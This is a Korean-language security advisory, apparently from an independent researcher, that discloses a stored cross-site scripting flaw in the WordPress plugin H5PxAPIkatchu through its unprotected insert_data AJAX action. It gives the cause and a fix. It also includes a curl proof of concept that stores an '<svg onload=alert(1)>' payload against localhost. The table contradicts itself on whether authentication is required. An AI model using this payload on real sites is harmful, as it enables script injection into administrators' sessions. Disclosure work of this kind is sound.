
CVE-2025-12904 공개
CVE-2025-12904에 대한 공개
이 저장소는 otacke가 개발한 WordPress 플러그인인 SNORDIAN's H5PxAPIkatchu <= 0.4.16에서 발견된 취약점을 공개합니다.
| CVE ID | 유형 | 구성 요소 | 영향 |
|---|---|---|---|
| CVE-2025-12904 | insert_data를 통한 비인증 저장형 크로스사이트 스크립팅 | class-table-view.php | 인증된 공격자가 JS를 실행할 수 있음 |
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
--data-urlencode 'action=insert_data' \
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
※ object 내의 id가 존재하지 않으면 실패합니다.
insert_data() 함수는 권한 검사를 수행하지 않아 인증 없이 악성 입력이 저장될 수 있었습니다. 또한 이러한 항목은 관리 인터페이스에서 이스케이프되지 않은 채 표시되었습니다.
insert_data() 함수는 current_user_can을 사용하여 권한 없는 실행을 방지할 수 있습니다.PoC를 만드는 것이 정말 힘들었다.
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
이 부분을 재현하는 데 시간을 너무 많이 써버렸다. curl 명령어를 더 잘 다룰 수 있게 되고 싶다. 그리고 이 플러그인... 이것저것 괜찮은 건가? 특히 이름이라든가, 말이지.
이름: MooseLove
역할: 독립 보안 연구원 / 버그 헌터
연락처: 요청 시 제공
본 보안 권고는 공공 보안 인식 제고를 위해 제공됩니다. 출처를 밝히면 자유롭게 공유할 수 있습니다.